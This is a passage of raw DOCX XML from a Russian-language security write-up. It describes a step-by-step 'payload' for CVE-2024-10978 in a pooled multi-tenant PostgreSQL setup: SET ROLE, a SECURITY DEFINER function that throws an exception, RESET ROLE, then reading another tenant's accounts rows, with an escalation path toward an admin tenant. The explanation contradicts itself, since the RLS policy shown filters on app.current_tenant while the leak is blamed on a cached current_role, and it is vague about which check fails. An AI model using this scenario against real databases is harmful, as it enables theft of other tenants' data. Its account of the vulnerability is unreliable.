      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    try:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        rows = await session.execute(text("SELECT * FROM accounts"))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        return [dict(r._mapping) for r in rows]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    finally:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        await session.execute(text("RESET ROLE"))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Login-роль </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pool_user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> имеет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на все </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">tenant_*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-роли; права на таблицу </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">accounts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> есть только у </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">tenant_X</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ролей, с RLS-политикой </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">tenant_id = current_setting('app.current_tenant')::int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Соединение возвращается в pool после </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">RESET ROLE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Сценарий считается безопасным </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">до</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> срабатывания CVE-2024-10978.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload — cross-tenant leak через прерванный reset</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2024-10978 нельзя триггернуть одним SQL-вызовом: для него нужна </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">последовательность</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> событий, при которой reset-path не отрабатывает корректно. Минимальный сценарий с SECURITY DEFINER:</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(от tenant_A через app):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SET ROLE tenant_A;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT app.do_audit_logged_action('user_x');  -- SECURITY DEFINER функция, внутри RAISE EXCEPTION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Внутри </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">do_audit_logged_action</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> происходит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">RAISE EXCEPTION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (например, проверка бизнес-правила). При выходе из функции с исключением reset current role работает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">некорректно</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current_role</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> остаётся </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">tenant_A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, хотя session_user = pool_user.</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(приложение перехватывает исключение, делает RESET ROLE, возвращает соединение в pool):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">RESET ROLE;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- pool возвращает соединение</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Reset на baseline </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pool_user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> срабатывает, но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">plan-cache внутри session содержит выражение `current_role`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, закэшированное под прерванной транзакцией. При следующем запросе план переиспользуется без re-evaluation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Шаг 3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (соединение выдано tenant_B):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SET ROLE tenant_B;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * FROM accounts;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Из-за бага в reset-pipeline один из этапов проверки прав (RLS policy evaluation, либо ACL check) использует кэшированный </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">current_role = tenant_A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> вместо нового </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">tenant_B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. RLS-политика </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">tenant_id = current_setting('app.current_tenant')::int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> фильтрует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">по неверному тенанту</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, возвращая строки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">accounts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> тенанта A приложению, обрабатывающему запрос от tenant_B.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Сервер возвращает:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> строки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">accounts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> чужого тенанта в HTTP-ответе. Application-код этого не замечает — нет ошибки, нет аномалии в логах.</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В multi-tenant приложении с pool-сессиями — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">тихая утечка чужих данных</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> между запросами разных тенантов. Запросы выглядят нормально с точки зрения application logs (правильный JWT, правильный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успешный response), но возвращаемые данные — от другого tenant-а. RLS не нарушается формально — выполняется политика, но с неверным значением </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">current_role</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Эскалация — к чтению (и потенциально записи, если INSERT/UPDATE использует тот же кэшированный role) данных любого тенанта, кому принадлежит соединение в pool.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Дополнительный эффект: если у </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">tenant_A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> есть привилегии, которых нет у </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">tenant_B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (например,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на admin-таблицы), то запрос от tenant_B получит доступ через права tenant_A. В цепочке это путь от обычного tenant-а к admin-tenant-у.</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Точная механика — баг в коде </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">src/backend/utils/init/miscinit.c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (функции </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
